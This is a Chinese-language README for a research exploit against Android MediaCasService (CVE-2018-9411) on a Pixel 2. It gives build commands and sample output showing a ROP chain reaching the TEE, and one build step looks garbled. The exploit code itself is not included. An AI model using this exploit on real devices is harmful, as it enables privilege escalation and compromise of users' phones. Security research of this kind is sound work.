CVE-2018-9411 MediaCasService 的利用代码。
请注意,此利用代码仅用于教育或防御目的,不得用于任何恶意或攻击性用途。
关于漏洞和利用的完整文章可在 Zimperium 博客 上获取。
如有任何问题,欢迎在 Twitter 上私信我 (@tamir_zb)。
注意:此利用代码仅适用于特定设备和构建版本 - 搭载 2018 年 5 月安全更新的 Pixel 2 (指纹: google/walleye/walleye:8.1.0/OPM2.171019.029.B1/4720900:user/release-keys)。
要构建此项目:
AOSP/external。cd AOSP
source build/envsetup.sh
make cas_exploit
成功运行此利用代码应获得对 TEE 设备的访问权限,通过获取 QSEOS 版本进行演示。
示例利用输出:
[+] Prepared descrambler object
[+] Determined small heap address (address = 0xec9d8000)
[+] Prepared remote threads
[+] Found target thread (stack address = 0xeb42b000, libc address = 0xec51d000)
[+] Copied data for ROP chain
[+] ROP stack written
[+] Running ROP chain...
[+] QSEOS version = 0x14